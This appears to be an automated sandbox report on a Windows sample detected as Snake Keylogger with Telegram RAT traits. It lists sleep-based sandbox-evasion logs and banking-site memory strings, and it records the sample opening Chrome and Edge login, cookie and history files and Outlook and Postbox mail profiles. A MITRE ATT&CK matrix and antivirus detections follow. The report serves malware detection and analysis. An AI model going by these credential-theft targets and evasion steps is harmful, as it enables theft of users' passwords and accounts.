            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594855Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594523Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594422Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594313Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeWindow / User API: threadDelayed 8377Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeWindow / User API: threadDelayed 1454Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7556Thread sleep count: 8377 > 30Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7556Thread sleep count: 1454 > 30Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -598891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -598563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -598438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -598313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -598078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -597969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -595750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -595640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -595422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -595313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -594855s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -594523s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -594422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552Thread sleep time: -594313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_0040276E FindFirstFileW,7_2_0040276E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405770
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_0040622B FindFirstFileW,FindClose,7_2_0040622B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594855Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594523Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594422Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 594313Jump to behavior
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeAPI call chain: ExitProcess graph end nodegraph_0-4509
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeAPI call chain: ExitProcess graph end nodegraph_0-4515
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD3E09 rdtsc 7_2_02BD3E09
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess created: C:\Users\user\Desktop\GBYfjUz4a5.exe "C:\Users\user\Desktop\GBYfjUz4a5.exe"Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeQueries volume information: C:\Users\user\Desktop\GBYfjUz4a5.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: GBYfjUz4a5.exe PID: 7312, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: Process Memory Space: GBYfjUz4a5.exe PID: 7312, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: GBYfjUz4a5.exe PID: 7312, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            Registry Run Keys / Startup Folder            		11
            Process Injection            		11
            Masquerading            		1
            OS Credential Dumping            		211
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Registry Run Keys / Startup Folder            		1
            Disable or Modify Tools            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Application Window Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		3
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS1
            System Network Configuration Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets3
            File and Directory Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials215
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            GBYfjUz4a5.exe68%VirustotalBrowse
            GBYfjUz4a5.exe50%ReversingLabsWin32.Spyware.Snakekeylogger
            GBYfjUz4a5.exe100%AviraTR/AD.NsisInject.fivjh

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dll0%ReversingLabs
